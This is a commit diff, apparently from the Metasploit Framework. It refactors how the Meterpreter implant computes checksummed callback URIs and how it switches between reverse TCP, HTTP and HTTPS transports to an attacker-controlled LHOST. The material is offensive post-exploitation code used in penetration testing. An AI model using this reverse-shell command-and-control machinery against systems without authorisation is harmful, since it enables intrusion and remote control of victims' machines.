Rejig code to support http payloads

* Move the uri checksum code to a spot that can be shared with rex.
* Adjust modules to make use of this new location.
* Fix up the tranpsort switcher to add the URI for those payloads.

Author: OJ

lib/msf/core/handler/reverse_http.rb

@@ -1,8 +1,8 @@
 # -*- coding: binary -*-
 require 'rex/io/stream_abstraction'
 require 'rex/sync/ref'
-require 'msf/core/handler/reverse_http/uri_checksum'
 require 'rex/payloads/meterpreter/patch'
+require 'rex/payloads/meterpreter/uri_checksum'
 require 'rex/parser/x509_certificate'
 require 'msf/core/payload/windows/verify_ssl'
 
@@ -17,7 +17,7 @@ module Handler
 module ReverseHttp
 
   include Msf::Handler
-  include Msf::Handler::ReverseHttp::UriChecksum
+  include Rex::Payloads::Meterpreter::UriChecksum
   include Msf::Payload::Windows::VerifySsl
 
   #

lib/msf/core/handler/reverse_http/uri_checksum.rb renamed to lib/rex/payloads/meterpreter/uri_checksum.rb

@@ -1,7 +1,7 @@
 # -*- coding: binary -*-
-module Msf
-  module Handler
-    module ReverseHttp
+module Rex
+  module Payloads
+    module Meterpreter
       module UriChecksum
 
         #

lib/rex/post/meterpreter/client_core.rb

@@ -11,6 +11,12 @@
 # Provides methods to patch options into the metsrv stager.
 require 'rex/payloads/meterpreter/patch'
 
+# URI checksum calculation
+require 'rex/payloads/meterpreter/uri_checksum'
+
+# URI checksumming stuff
+require 'msf/core/handler/reverse_https'
+
 module Rex
 module Post
 module Meterpreter
@@ -28,6 +34,8 @@ class ClientCore < Extension
   UNIX_PATH_MAX = 108
   DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock"
 
+  include Rex::Payloads::Meterpreter::UriChecksum
+
   #
   # Initializes the 'core' portion of the meterpreter client commands.
   #
@@ -226,14 +234,17 @@ def change_transport(opts={})
     request = Packet.create_request('core_change_transport')
 
     url = "#{opts[:scheme]}://#{opts[:lhost]}:#{opts[:lport]}"
-    url <<  '/' + opts[:suffix] if opts[:suffix]
+
+    if opts[:adduri]
+      checksum = generate_uri_checksum(URI_CHECKSUM_CONN)
+      rand = Rex::Text.rand_text_alphanumeric(16)
+      url <<  "/#{checksum}_#{rand}/"
+    end
 
     request.add_tlv(TLV_TYPE_TRANSPORT_TYPE, opts[:type])
     request.add_tlv(TLV_TYPE_TRANSPORT_URL, url)
 
     response = client.send_request(request)
-
-    # TODO: shut this baby down.
   end
 
   #

lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb

@@ -18,6 +18,18 @@ class Console::CommandDispatcher::Core
 
   include Console::CommandDispatcher
 
+  METERPRETER_TRANSPORT_SSL   = 0
+  METERPRETER_TRANSPORT_HTTP  = 1
+  METERPRETER_TRANSPORT_HTTPS = 2
+
+  VALID_TRANSPORTS = {
+    'reverse_tcp'   => METERPRETER_TRANSPORT_SSL,
+    'reverse_http'  => METERPRETER_TRANSPORT_HTTP,
+    'reverse_https' => METERPRETER_TRANSPORT_HTTPS,
+    'bind_tcp'      => METERPRETER_TRANSPORT_SSL
+  }
+
+
   #
   # Initializes an instance of the core command set using the supplied shell
   # for interactivity.
@@ -327,11 +339,8 @@ def cmd_transport(*args)
       return true
     end
 
-    # the order of these is important (hacky!)
-    valid_transports = ['reverse_tcp', 'reverse_http', 'reverse_https', 'bind_tcp']
-
     transport = args.shift.downcase
-    unless valid_transports.include?(transport)
+    unless VALID_TRANSPORTS.has_key?(transport)
       #cmd_transport_help
     end
 
@@ -342,30 +351,25 @@ def cmd_transport(*args)
 
       lhost = ""
       lport = args.shift.to_i
-      type = 0
     else
       unless args.length == 2
         #cmd_transport_help
       end
 
       lhost = args.shift
       lport = args.shift.to_i
-      type = valid_transports.index(transport)
-    end
-
-    suffix = nil
-    unless transport.ends_with?("tcp")
-      suffix = "some magic URL"
     end
 
+    print_status("Swapping transport ...")
     client.core.change_transport({
-      :type   => type,
+      :type   => VALID_TRANSPORTS[transport],
       :scheme => transport.split('_')[1],
       :lhost  => lhost,
       :lport  => lport,
-      :suffix => suffix
+      :adduri => !transport.ends_with?('tcp')
     })
-
+    client.shutdown_passive_dispatcher
+    shell.stop
   end
 
   def cmd_migrate_help

modules/payloads/singles/windows/meterpreter_reverse_https.rb

@@ -37,7 +37,7 @@ def initialize(info = {})
   end
 
   def generate
-    checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
+    checksum = generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN)
     rand = Rex::Text.rand_text_alphanumeric(16)
     url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"